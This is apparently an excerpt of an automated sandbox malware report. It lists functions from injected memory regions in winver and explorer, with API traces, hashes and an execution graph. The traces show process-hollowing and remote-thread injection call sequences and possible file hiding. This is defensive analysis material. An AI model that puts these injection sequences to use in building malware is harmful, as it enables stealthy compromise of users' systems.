                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Create$DirectorySleep$AttributesChangeCloseFileFindNotificationProcess32$FirstLibraryLoadMutexNextSnapshotThreadToolhelp32lstrcmpi
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4243289212-0
                                                                                                                                                                          • Opcode ID: abfbc6871ba53161fe70b4bc33d47f3343101ac8d1b137fc9e23998c520ffae8
                                                                                                                                                                          • Instruction ID: 6777e6789e759070a149c9781162f979fbd846cb782b1f6ec02d3d30eba4e02f
                                                                                                                                                                          • Opcode Fuzzy Hash: abfbc6871ba53161fe70b4bc33d47f3343101ac8d1b137fc9e23998c520ffae8
                                                                                                                                                                          • Instruction Fuzzy Hash: 1AD05EA10141B07DFB007FB28C8CD7B318CEE082083404735BE85D9265DDB469448976
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 047E2DCF Relevance: 12.1, APIs: 8, Instructions: 52encryptionCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,047E2DA0,0000002F,?,00000000,00000001,F0000000), ref: 047E2DE0
                                                                                                                                                                          • CryptImportPublicKeyInfo.CRYPT32(?,00000001,?,00000000), ref: 047E2E06
                                                                                                                                                                          • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,00000000), ref: 047E2E29
                                                                                                                                                                          • CryptHashData.ADVAPI32(?,00000080,00000080,00000000), ref: 047E2E43
                                                                                                                                                                          • CryptVerifySignatureA.ADVAPI32(?,047E2A30,047E2A2C,?,00000000,00000000), ref: 047E2E63
                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(?), ref: 047E2E71
                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(?), ref: 047E2E7D
                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 047E2E8B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Crypt$Hash$ContextDestroy$AcquireCreateDataImportInfoPublicReleaseSignatureVerify
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 295346115-0
                                                                                                                                                                          • Opcode ID: 8daccd83c1521e93d6aa3a18378ac6c6e3e6a1207c5cbc88546a17831c3b5411
                                                                                                                                                                          • Instruction ID: a3aead413fb57d80102c6c83b18f3c82fb380e847d28e842346fea41c5d3cb2e
                                                                                                                                                                          • Opcode Fuzzy Hash: 8daccd83c1521e93d6aa3a18378ac6c6e3e6a1207c5cbc88546a17831c3b5411
                                                                                                                                                                          • Instruction Fuzzy Hash: 10111C31600124BBEF221F20CC89BE97B79AF54704F1441D5BE8ABD0A5DBB199A0DF58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E093E Relevance: 18.1, APIs: 12, Instructions: 134sleepthreadCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 047E0959
                                                                                                                                                                          • RtlExitUserThread.NTDLL(00000000), ref: 047E0961
                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 047E0981
                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 047E0999
                                                                                                                                                                            • Part of subcall function 047E09D9: CreateProcessA.KERNEL32(00000000,047E09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 047E09E0
                                                                                                                                                                            • Part of subcall function 047E09D9: GetThreadContext.KERNEL32(?,00000000), ref: 047E0A08
                                                                                                                                                                            • Part of subcall function 047E09D9: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 047E0A33
                                                                                                                                                                            • Part of subcall function 047E09D9: DuplicateHandle.KERNEL32(000000FF,000000FF,?,047E5810,00000000,00000000,00000002), ref: 047E0A78
                                                                                                                                                                            • Part of subcall function 047E09D9: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 047E0AA6
                                                                                                                                                                            • Part of subcall function 047E09D9: ResumeThread.KERNEL32(?), ref: 047E0AB6
                                                                                                                                                                            • Part of subcall function 047E09D9: Sleep.KERNEL32(000003E8), ref: 047E0AC6
                                                                                                                                                                            • Part of subcall function 047E09D9: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 047E0ADD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1099281029-0
                                                                                                                                                                          • Opcode ID: 5d03330d33b3b27a40e3269c6242ef1dc1a02b5c5defd31e13463acd8d2fdf85
                                                                                                                                                                          • Instruction ID: 3d6c038a43eae77c320b336a39f909fe36ce8f4fae190383711c705ac3d023bc
                                                                                                                                                                          • Opcode Fuzzy Hash: 5d03330d33b3b27a40e3269c6242ef1dc1a02b5c5defd31e13463acd8d2fdf85
                                                                                                                                                                          • Instruction Fuzzy Hash: C651C3311442A49FEB225F21CC85BA937F8EF08744F0402D5BA45FE1D6DAB0A590CA65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E34B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 047E34A2
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,047E34AD), ref: 047E34B1
                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000000), ref: 047E34C2
                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 047E34CD
                                                                                                                                                                            • Part of subcall function 047E276C: VirtualAlloc.KERNEL32(00000000,03E80005,00003000,00000004,?,00000000), ref: 047E2787
                                                                                                                                                                            • Part of subcall function 047E276C: lstrcat.KERNEL32(00000000,047E27D1), ref: 047E27E0
                                                                                                                                                                            • Part of subcall function 047E276C: VirtualFree.KERNEL32(-00000005,00000000,00008000,00000000,-00000005,03E80005,00000004,?,00000000), ref: 047E2805
                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,000000C9), ref: 047E34E7
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 047E34EE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Virtuallstrcat$Free$AllocCloseHandleNextProcess32lstrlen
                                                                                                                                                                          • String ID: W
                                                                                                                                                                          • API String ID: 1406046206-655174618
                                                                                                                                                                          • Opcode ID: c8fa19f9968db6785e07a1955e6f0d7ff49f84e83013956b77b58b1155eecca2
                                                                                                                                                                          • Instruction ID: 4a4884b67f6eecfc99f3281419e626097448c57e5926bd324ec2d757a42427b5
                                                                                                                                                                          • Opcode Fuzzy Hash: c8fa19f9968db6785e07a1955e6f0d7ff49f84e83013956b77b58b1155eecca2
                                                                                                                                                                          • Instruction Fuzzy Hash: A4F044711055106EFB136F708CC8FBE3ABCAF46705F04019CFE49FA059DB7451159AA9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E09D9 Relevance: 12.1, APIs: 8, Instructions: 76threadsleepprocessCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,047E09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 047E09E0
                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 047E0A08
                                                                                                                                                                          • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 047E0A33
                                                                                                                                                                          • DuplicateHandle.KERNEL32(000000FF,000000FF,?,047E5810,00000000,00000000,00000002), ref: 047E0A78
                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 047E0AA6
                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 047E0AB6
                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 047E0AC6
                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 047E0ADD
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 617592159-0
                                                                                                                                                                          • Opcode ID: cb1a56bbf55a9609519a9d5e117579c9d2b8a90392855b77a87fbfe701f84b21
                                                                                                                                                                          • Instruction ID: e6a87313a8bf63616989099562d5b2d4742c4429c5eced76da7ba4cadaa2351b
                                                                                                                                                                          • Opcode Fuzzy Hash: cb1a56bbf55a9609519a9d5e117579c9d2b8a90392855b77a87fbfe701f84b21
                                                                                                                                                                          • Instruction Fuzzy Hash: 5B3152316402689FEF229F11CC85BAA77F8FF04744F080295AA49FE1E5DBB0A690DE54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E2535 Relevance: 7.6, APIs: 5, Instructions: 95stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(047E2525,00000010,?,?,047E29F8,00000104), ref: 047E253A
                                                                                                                                                                            • Part of subcall function 047E2572: lstrcat.KERNEL32(047E29F8,047E2553), ref: 047E257A
                                                                                                                                                                            • Part of subcall function 047E2572: lstrcat.KERNEL32(047E29F8,00000000), ref: 047E258D
                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(047E25BB,0000000B,?,00000000,047E2634,00000104), ref: 047E25CB
                                                                                                                                                                          • lstrcat.KERNEL32(047E2634,00000000), ref: 047E25DE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcat$EnvironmentExpandStrings
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2903145849-0
                                                                                                                                                                          • Opcode ID: 815612cc5c30cec6fa8ba0fbaeab2fe1927bb25e379c814d3d0a7115e2d1fffc
                                                                                                                                                                          • Instruction ID: 285a816b915afe20439cafe79c75478269316b8cd83b913eee1b169ee24e0db0
                                                                                                                                                                          • Opcode Fuzzy Hash: 815612cc5c30cec6fa8ba0fbaeab2fe1927bb25e379c814d3d0a7115e2d1fffc
                                                                                                                                                                          • Instruction Fuzzy Hash: 2331F871148281AFEB039F60CC568F97B6CFF06308B0841EBE985DE063D6745557DBA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E31C6 Relevance: 7.6, APIs: 5, Instructions: 62processstringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 047E2597: lstrcat.KERNEL32(047E2634,00000000), ref: 047E25DE
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 047E31EA
                                                                                                                                                                            • Part of subcall function 047E26F9: CreateFileA.KERNELBASE(?,40000000,00000003,00000000,?,00000080,00000000,?,00000000), ref: 047E2715
                                                                                                                                                                            • Part of subcall function 047E26F9: SetFilePointer.KERNELBASE(?,00000000,00000000,00000002), ref: 047E2732
                                                                                                                                                                            • Part of subcall function 047E26F9: WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 047E274E
                                                                                                                                                                            • Part of subcall function 047E26F9: CloseHandle.KERNEL32(?), ref: 047E275F
                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 047E3228
                                                                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,047E31B5,00000011,?,00000000,00000000), ref: 047E3255
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,047E31B5,00000011,?,00000000,00000000,00000000,047E306E,00000004,00000000), ref: 047E3261
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,047E31B5,00000011,?,00000000,00000000,00000000,047E306E,00000004,00000000), ref: 047E326D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseFileHandle$Createlstrcat$InfoPointerProcessStartupWrite
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1477093598-0
                                                                                                                                                                          • Opcode ID: 52ca7a41ac4a32d2a2c9c3052bde0af75adf02ba36e72263bc001af510b0aaac
                                                                                                                                                                          • Instruction ID: 1aacb9445c8c210e640d967aba6c1ae43c8537fd96e3f7c35dd174f2c68ef583
                                                                                                                                                                          • Opcode Fuzzy Hash: 52ca7a41ac4a32d2a2c9c3052bde0af75adf02ba36e72263bc001af510b0aaac
                                                                                                                                                                          • Instruction Fuzzy Hash: C81166724045149FEF126F71CC48FAF77BDEF44305F0149A9E985E7105DA306A90CEA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E343F Relevance: 7.5, APIs: 5, Instructions: 43processmemorystringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 047E344D
                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000000), ref: 047E3473
                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 047E348B
                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 047E34A2
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 047E34EE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocCloseCreateFirstHandleProcess32SnapshotToolhelp32Virtuallstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1167326197-0
                                                                                                                                                                          • Opcode ID: 5f9d1eb2edb9076798b234430a1619a4ded5de1aa51cd46c1ede4133039d73f4
                                                                                                                                                                          • Instruction ID: 6c68ea2bfb6a22ad56d97950bd76a51a8f6f0444fe6e24a7c13205f38938aade
                                                                                                                                                                          • Opcode Fuzzy Hash: 5f9d1eb2edb9076798b234430a1619a4ded5de1aa51cd46c1ede4133039d73f4
                                                                                                                                                                          • Instruction Fuzzy Hash: CB01F2702412106FFB236A218C89BB936E8AF06755F0402A8BD44FF1D5DF74981589A9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E3F0D Relevance: 6.0, APIs: 4, Instructions: 26sleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,047E3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 047E3F2D
                                                                                                                                                                          • Sleep.KERNEL32(000003E8,00000000,?,047E3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 047E3F4B
                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 047E3F5B
                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 047E3F6B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$HandleModule
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3646095425-0
                                                                                                                                                                          • Opcode ID: ab11c2741b2bf6d40620f8a1c1d83e6402f3f97ec40c804351164b00e2b9bff0
                                                                                                                                                                          • Instruction ID: df93994fdb88c21945cd37539266e25e41a19b79c93d3b4335d23761d13c13d6
                                                                                                                                                                          • Opcode Fuzzy Hash: ab11c2741b2bf6d40620f8a1c1d83e6402f3f97ec40c804351164b00e2b9bff0
                                                                                                                                                                          • Instruction Fuzzy Hash: 2FF01270598240A6FF403B728C4D67936B85F4870AF040691BD49AF2D5DE74A5509E75
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 047E3EC3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(047E3EBD,00000006,E8FFFE1B,00000000), ref: 047E3EC8
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,047E3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 047E3F2D
                                                                                                                                                                            • Part of subcall function 047E0C9C: GetProcAddress.KERNEL32(047E2811,047E290A), ref: 047E0CA9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2980119764.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_47e0000_winver.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                          • String ID: j
                                                                                                                                                                          • API String ID: 310444273-2747090070
                                                                                                                                                                          • Opcode ID: efa1dc669fdda1affb635a68a859d1326d4b89420978e385a295ff765e4871df
                                                                                                                                                                          • Instruction ID: c61149ba3190729ff0f4f37dc7d13be8988ae42101568a9dfcc3e8f94fb25082
                                                                                                                                                                          • Opcode Fuzzy Hash: efa1dc669fdda1affb635a68a859d1326d4b89420978e385a295ff765e4871df
                                                                                                                                                                          • Instruction Fuzzy Hash: 13F06871504250ADFB116A738848BBA32BCAF48749F044765AD85DB350EE70F580DAB6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:8.1%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                          Signature Coverage:2.6%
                                                                                                                                                                          Total number of Nodes:192
                                                                                                                                                                          Total number of Limit Nodes:20
                                                                                                                                                                          execution_graph 5242 1390b6b 5243 1390b7d 5242->5243 5244 13908b3 6 API calls 5243->5244 5245 1390bb1 5244->5245 5246 1390c3f GetPEB 5245->5246 5247 1390bb6 5246->5247 5008 1391f5e 5009 1391f6c 5008->5009 5010 1391f82 5008->5010 5012 1391f8d VirtualAllocEx WriteProcessMemory CreateRemoteThread 5009->5012 5012->5010 5013 1391ee1 NtCreateUserProcess 5238 1392270 5239 139228b NtQueryDirectoryFile 5238->5239 5240 1392394 5239->5240 5241 13922f7 5239->5241 5241->5239 5241->5240 5014 13908b3 5015 13908b9 5014->5015 5016 13908d0 5014->5016 5028 1391e62 5015->5028 5038 13908d9 5016->5038 5029 1391e73 5028->5029 5046 1391d5a 5029->5046 5032 1391d5a 3 API calls 5033 1391eb9 5032->5033 5034 1391d5a 3 API calls 5033->5034 5035 1391ecc 5034->5035 5036 1391d5a 3 API calls 5035->5036 5037 13908c5 RtlExitUserThread 5036->5037 5037->5016 5054 1390cc4 5038->5054 5040 13908e5 5057 1390643 5040->5057 5042 139091f 5065 139093e 5042->5065 5044 13908ef 5044->5042 5045 1391e62 3 API calls 5044->5045 5045->5042 5047 1391d6e 5046->5047 5048 1391e60 5046->5048 5047->5048 5049 1391d80 VirtualProtect 5047->5049 5048->5032 5049->5048 5050 1391dac 5049->5050 5051 1391daf VirtualAlloc 5050->5051 5051->5051 5052 1391de1 5051->5052 5053 1391e09 VirtualProtect 5052->5053 5053->5048 5072 1390c3f GetPEB 5054->5072 5056 1390cc9 5056->5040 5058 1390660 5057->5058 5074 139067c 5058->5074 5060 1390673 5080 13906c2 5060->5080 5062 13906b9 5063 139080f 5062->5063 5084 1390811 5062->5084 5063->5044 5066 1390cc4 GetPEB 5065->5066 5068 139094a 5066->5068 5067 1390af1 5067->5042 5068->5067 5099 13909d9 5068->5099 5071 13909d2 5071->5067 5103 1390af3 5071->5103 5073 1390c4b 5072->5073 5073->5056 5073->5073 5075 1390681 5074->5075 5076 13906c2 6 API calls 5075->5076 5078 13906b9 5076->5078 5077 139080f 5077->5060 5078->5077 5079 1390811 6 API calls 5078->5079 5079->5077 5082 13906c7 5080->5082 5081 139080f 5081->5062 5082->5081 5083 1390811 6 API calls 5082->5083 5083->5081 5088 1390840 5084->5088 5085 13908d0 5087 13908d9 5 API calls 5085->5087 5086 13908c5 RtlExitUserThread 5086->5085 5089 1390863 5087->5089 5088->5085 5088->5086 5088->5089 5091 1390866 5088->5091 5093 1391e62 3 API calls 5088->5093 5090 1390cc4 GetPEB 5089->5090 5089->5091 5092 13908e5 5090->5092 5091->5063 5094 1390643 5 API calls 5092->5094 5093->5086 5095 13908ef 5094->5095 5097 1391e62 3 API calls 5095->5097 5098 139091f 5095->5098 5096 139093e 5 API calls 5096->5098 5097->5098 5098->5096 5102 13909de 5099->5102 5100 1390af3 6 API calls 5101 1390af1 5100->5101 5101->5071 5102->5100 5102->5101 5105 1390b01 5103->5105 5106 1390cc4 GetPEB 5105->5106 5107 1390b0d 5106->5107 5112 1390b27 5107->5112 5109 1390b20 5110 1390b57 5109->5110 5116 1390b65 5109->5116 5113 1390b2c 5112->5113 5114 1390b65 6 API calls 5113->5114 5115 1390b57 5114->5115 5115->5109 5117 1390b6a 5116->5117 5122 13908b3 5117->5122 5123 13908b9 5122->5123 5124 13908d0 5122->5124 5127 1391e62 3 API calls 5123->5127 5125 13908d9 5 API calls 5124->5125 5126 13908d5 5125->5126 5128 1390cc4 GetPEB 5126->5128 5129 13908c5 RtlExitUserThread 5127->5129 5130 13908e5 5128->5130 5129->5124 5131 1390643 5 API calls 5130->5131 5133 13908ef 5131->5133 5132 139093e 5 API calls 5135 139091f 5132->5135 5134 1391e62 3 API calls 5133->5134 5133->5135 5134->5135 5135->5132 5136 34508d9 5144 3450cc4 5136->5144 5138 34508e5 5147 3450643 5138->5147 5140 3450939 5155 345093e 5140->5155 5142 34508ef 5142->5140 5143 345091f SleepEx RtlExitUserThread 5142->5143 5143->5140 5162 3450c3f GetPEB 5144->5162 5146 3450cc9 5146->5138 5148 3450660 5147->5148 5164 345067c 5148->5164 5150 3450673 5170 34506c2 5150->5170 5152 345080f 5152->5142 5153 34506b9 5153->5152 5174 3450811 5153->5174 5156 3450cc4 GetPEB 5155->5156 5158 345094a 5156->5158 5157 3450af1 5157->5140 5158->5157 5194 34509d9 5158->5194 5161 34509d2 5161->5157 5198 3450af3 5161->5198 5163 3450c4b 5162->5163 5163->5146 5163->5163 5165 3450681 5164->5165 5166 34506c2 7 API calls 5165->5166 5168 34506b9 5166->5168 5167 345080f 5167->5150 5168->5167 5169 3450811 7 API calls 5168->5169 5169->5167 5172 34506c7 5170->5172 5171 345080f 5171->5153 5172->5171 5173 3450811 7 API calls 5172->5173 5173->5171 5176 3450840 5174->5176 5175 3450863 5178 3450cc4 GetPEB 5175->5178 5179 3450866 5175->5179 5176->5175 5176->5179 5186 34508d9 5176->5186 5180 34508e5 5178->5180 5179->5152 5181 3450643 5 API calls 5180->5181 5184 34508ef 5181->5184 5182 3450939 5183 345093e 5 API calls 5182->5183 5183->5182 5184->5182 5185 345091f SleepEx RtlExitUserThread 5184->5185 5185->5182 5187 3450cc4 GetPEB 5186->5187 5188 34508e5 5187->5188 5189 3450643 5 API calls 5188->5189 5192 34508ef 5189->5192 5190 3450939 5191 345093e 5 API calls 5190->5191 5191->5190 5192->5190 5193 345091f SleepEx RtlExitUserThread 5192->5193 5193->5190 5197 34509de 5194->5197 5195 3450af3 7 API calls 5196 3450af1 5195->5196 5196->5161 5197->5195 5197->5196 5200 3450b01 5198->5200 5201 3450cc4 GetPEB 5200->5201 5202 3450b0d 5201->5202 5207 3450b27 5202->5207 5204 3450b20 5211 3450b65 5204->5211 5208 3450b2c 5207->5208 5209 3450b65 7 API calls 5208->5209 5210 3450b57 5208->5210 5209->5210 5210->5204 5215 3450b6a 5211->5215 5217 34508b3 5215->5217 5218 34508b9 5217->5218 5219 34508d9 5 API calls 5218->5219 5220 34508d5 5219->5220 5221 3450cc4 GetPEB 5220->5221 5222 34508e5 5221->5222 5223 3450643 5 API calls 5222->5223 5226 34508ef 5223->5226 5224 3450939 5225 345093e 5 API calls 5224->5225 5225->5224 5226->5224 5227 345091f SleepEx RtlExitUserThread 5226->5227 5227->5224 5228 1392334 5230 13922f7 5228->5230 5229 1392394 5230->5229 5231 139228b NtQueryDirectoryFile 5230->5231 5231->5229 5231->5230 5232 3450b6b 5234 3450b7d 5232->5234 5233 34508b3 7 API calls 5235 3450bb1 5233->5235 5234->5233 5236 3450c3f GetPEB 5235->5236 5237 3450bb6 5236->5237

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 01391F8D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80injectionmemorythreadCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • VirtualAllocEx.KERNELBASE ref: 01391FDE
                                                                                                                                                                          • WriteProcessMemory.KERNEL32 ref: 01392000
                                                                                                                                                                          • CreateRemoteThread.KERNEL32 ref: 01392028
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2983323352.0000000001390000.00000040.00000001.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1390000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocCreateMemoryProcessRemoteThreadVirtualWrite
                                                                                                                                                                          • String ID: @
                                                                                                                                                                          • API String ID: 1718980022-2766056989
                                                                                                                                                                          • Opcode ID: 555e0c67af10e97da054ffcb9d0bcadb1ad1097a1fa24538a47e0c0e30f3960e
                                                                                                                                                                          • Instruction ID: 5dfa931b168189c6da55d443e70d6d7ed06949fb25be811420ce0b21a591a078
                                                                                                                                                                          • Opcode Fuzzy Hash: 555e0c67af10e97da054ffcb9d0bcadb1ad1097a1fa24538a47e0c0e30f3960e
                                                                                                                                                                          • Instruction Fuzzy Hash: CF118F3120C9084FE748EA1CE80D76577DAF7D8325F25436EE44ED3295DE3899168785
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 01392270 Relevance: 1.6, APIs: 1, Instructions: 132filenativeCOMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
